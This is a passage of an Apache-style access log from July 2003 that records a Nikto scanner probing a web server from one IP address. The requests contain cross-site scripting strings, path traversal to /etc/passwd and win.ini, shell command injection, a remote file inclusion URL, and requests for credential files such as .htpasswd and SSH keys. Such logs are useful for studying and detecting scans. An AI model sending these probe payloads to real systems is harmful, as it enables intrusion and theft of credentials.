- [24/Jul/2003:01:33:35 +0900] "GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:36 +0900] "GET /.forward HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:37 +0900] "GET /.history HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:37 +0900] "GET /.htaccess HTTP/1.0" 403 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:38 +0900] "GET /.htpasswd HTTP/1.0" 403 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:39 +0900] "GET /.lynx_cookies HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:40 +0900] "GET /.mysql_history HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:40 +0900] "GET /.passwd HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:41 +0900] "GET /.pinerc HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:42 +0900] "GET /.plan HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:42 +0900] "GET /.proclog HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:43 +0900] "GET /.procmailrc HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:44 +0900] "GET /.profile HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:45 +0900] "GET /.rhosts HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:45 +0900] "GET /.sh_history HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:46 +0900] "GET /.ssh HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:47 +0900] "GET /.ssh/authorized_keys HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:47 +0900] "GET /.ssh/known_hosts HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:48 +0900] "GET ////./../.../boot.ini HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:49 +0900] "GET ///etc/hosts HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:50 +0900] "GET ///etc/passwd HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:50 +0900] "GET //admin/admin.shtml HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:51 +0900] "GET //comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:52 +0900] "GET //profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:53 +0900] "GET /<script>alert('Vulnerable')</script> HTTP/1.0" 404 320 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:53 +0900] "GET /<script>alert('Vulnerable')</script>.aspx HTTP/1.0" 404 325 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:54 +0900] "GET /<script>alert('Vulnerable')</script>.jsp HTTP/1.0" 404 324 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:55 +0900] "GET /<script>alert('Vulnerable')</script>.shtml HTTP/1.0" 404 326 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:55 +0900] "GET /<script>alert('Vulnerable')</script>.thtml HTTP/1.0" 404 326 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:56 +0900] "GET /?mod=<script>alert(document.cookie)</script>&op=browse HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:57 +0900] "GET /?mod=node&nid=some_thing&op=view HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:58 +0900] "GET /?mod=some_thing&op=browse HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:33:59 +0900] "GET /?sql_debug=1 HTTP/1.0" 200 3923 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:00 +0900] "GET /a%5c.aspx HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:01 +0900] "GET /a.jsp/<script>alert('Vulnerable')</script> HTTP/1.0" 404 326 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:02 +0900] "GET /a/ HTTP/1.0" 404 274 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:03 +0900] "GET /a?<script>alert('Vulnerable')</script> HTTP/1.0" 404 273 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:03 +0900] "GET /access-log HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:04 +0900] "GET /access.log HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:05 +0900] "GET /access/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:05 +0900] "GET /account/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:06 +0900] "GET /accounting/ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:07 +0900] "GET /accounts/getuserdesc.asp HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:08 +0900] "GET /achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ HTTP/1.0" 404 325 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:08 +0900] "GET /active.log HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:09 +0900] "GET /add.php HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:10 +0900] "GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:10 +0900] "GET /addressbook.php?\\\"><script>alert(Vulnerable)</script><!-- HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:11 +0900] "GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:12 +0900] "GET /addressbook/index.php?surname=<script>alert('Vulnerable')</script> HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:13 +0900] "GET /addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt; HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:13 +0900] "GET /add_user.php HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:14 +0900] "GET /admin.htm HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:15 +0900] "GET /admin.html HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:15 +0900] "GET /admin.html HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:16 +0900] "GET /admin.php HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:17 +0900] "GET /admin.php3 HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:18 +0900] "GET /admin.php4?reg_login=1 HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:18 +0900] "GET /admin.php?en_log_id=0&action=config HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:19 +0900] "GET /admin.php?en_log_id=0&action=users HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:20 +0900] "GET /admin.shtml HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:20 +0900] "GET /admin/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:21 +0900] "GET /Admin/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:22 +0900] "GET /admin/admin_phpinfo.php4 HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:23 +0900] "GET /admin/browse.asp?FilePath=c:\\&Opt=2&level=0 HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:23 +0900] "GET /admin/contextAdmin/contextAdmin.html HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:24 +0900] "GET /admin/cplogfile.log HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:25 +0900] "GET /admin/exec.php3?cmd=cat%20/etc/passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:25 +0900] "GET /admin/exec.php3?cmd=dir%20c:\\\", HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:26 +0900] "GET /admin/login.php?action=insert&username=test&password=test HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:27 +0900] "GET /admin/login.php?path=\\\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script> HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:34:28 +0900] "GET /admin/phpinfo.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:28 +0900] "GET /admin/phpinfo.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:29 +0900] "GET /admin/system.php3?cmd=cat%20/etc/passwd HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:30 +0900] "GET /admin/system.php3?cmd=dir%20c:\\\", HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:30 +0900] "GET /admin/system_footer.php HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:31 +0900] "GET /Administration/ HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:32 +0900] "GET /administration/ HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:33 +0900] "GET /administrator/ HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:33 +0900] "GET /administrator/gallery/gallery.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:34 +0900] "GET /administrator/gallery/navigation.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:35 +0900] "GET /administrator/gallery/uploadimage.php HTTP/1.0" 404 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:35 +0900] "GET /administrator/gallery/uploadimage.php?directory=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:36 +0900] "GET /administrator/gallery/view.php?path=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:37 +0900] "GET /administrator/popups/sectionswindow.php?type=web&link=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 311 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:38 +0900] "GET /administrator/upload.php?newbanner=1&choice=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:38 +0900] "GET /Admin_files/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:39 +0900] "GET /Admin_files/order.log HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:40 +0900] "GET /advwebadmin/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:40 +0900] "GET /agentadmin.php HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:41 +0900] "GET /akopia/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:42 +0900] "GET /aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script> HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:43 +0900] "GET /albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd HTTP/1.0" 404 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:43 +0900] "GET /analog/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:44 +0900] "GET /ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:45 +0900] "GET /ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:45 +0900] "GET /anthill/login.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:46 +0900] "GET /app/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:47 +0900] "GET /apps/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:48 +0900] "GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:48 +0900] "GET /archive/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:49 +0900] "GET /article.php?article=4965&post=1111111111 HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:50 +0900] "GET /article.php?sid=\\\"><Img Src=javascript:alert('Vulnerable')><Img Src=\\\" HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:34:50 +0900] "GET /asp/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:51 +0900] "GET /ASP/cart/database/metacart.mdb HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:52 +0900] "GET /atc/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:53 +0900] "GET /author.asp HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:53 +0900] "GET /autohtml.php?op=modload&mainfile=x&name=/etc/passwd HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:54 +0900] "GET /awebvisit.stat HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:55 +0900] "GET /axis-cgi/buffer/command.cgi HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:55 +0900] "GET /a_security.htm HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:56 +0900] "GET /b2-include/b2edit.showposts.php HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:57 +0900] "GET /backup/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:58 +0900] "GET /bak/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:58 +0900] "GET /ban.bak HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:34:59 +0900] "GET /ban.dat HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:00 +0900] "GET /ban.log HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:00 +0900] "GET /banmat.pwd HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:01 +0900] "GET /base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:02 +0900] "GET /basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:03 +0900] "GET /bb-dnbd/faxsurvey HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:03 +0900] "GET /bb000001.pl<script>alert('Vulnerable')</script> HTTP/1.0" 404 331 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:04 +0900] "GET /bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:05 +0900] "GET /bc4j.html HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:05 +0900] "GET /beta/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:06 +0900] "GET /bigconf.cgi HTTP/1.0" 403 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:07 +0900] "GET /billing/billing.apw HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:08 +0900] "GET /bin/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:08 +0900] "GET /blah-whatever-badfile.jsp HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:09 +0900] "GET /blah123.php HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:10 +0900] "GET /blah_badfile.shtml HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:10 +0900] "GET /bottom.html HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:11 +0900] "GET /buddies.blt HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:12 +0900] "GET /buddy.blt HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:13 +0900] "GET /buddylist.blt HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:13 +0900] "GET /buy/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:14 +0900] "GET /buynow/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:15 +0900] "GET /c/ HTTP/1.0" 404 274 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:15 +0900] "GET /c32web.exe/ChangeAdminPassword HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:16 +0900] "GET /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini HTTP/1.0" 404 322 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:17 +0900] "GET /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd HTTP/1.0" 404 314 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:18 +0900] "GET /ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini HTTP/1.0" 404 325 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:18 +0900] "GET /ca000001.pl?ACTION=SHOWCART&hop=\\\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:19 +0900] "GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:20 +0900] "GET /cache-stats/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:20 +0900] "GET /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:21 +0900] "GET /cart/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:22 +0900] "GET /cartcart.cgi HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:23 +0900] "GET /catalog/includes/include_once.php HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:23 +0900] "GET /categorie.php3?cid=june HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:24 +0900] "GET /catinfo HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:25 +0900] "GET /catinfo?<u><b>TESTING HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:25 +0900] "GET /catinfo?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:26 +0900] "GET /cbms/cbmsfoot.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:27 +0900] "GET /cbms/changepass.php HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:28 +0900] "GET /cbms/editclient.php HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:28 +0900] "GET /cbms/passgen.php HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:29 +0900] "GET /cbms/realinv.php HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:30 +0900] "GET /cbms/usersetup.php HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:30 +0900] "GET /ccard/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:31 +0900] "GET /ccbill/secure/ccbill.log HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:32 +0900] "GET /cfappman/index.cfm HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:33 +0900] "GET /cfcache.map HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:33 +0900] "GET /cfdocs/cfcache.map HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:34 +0900] "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - 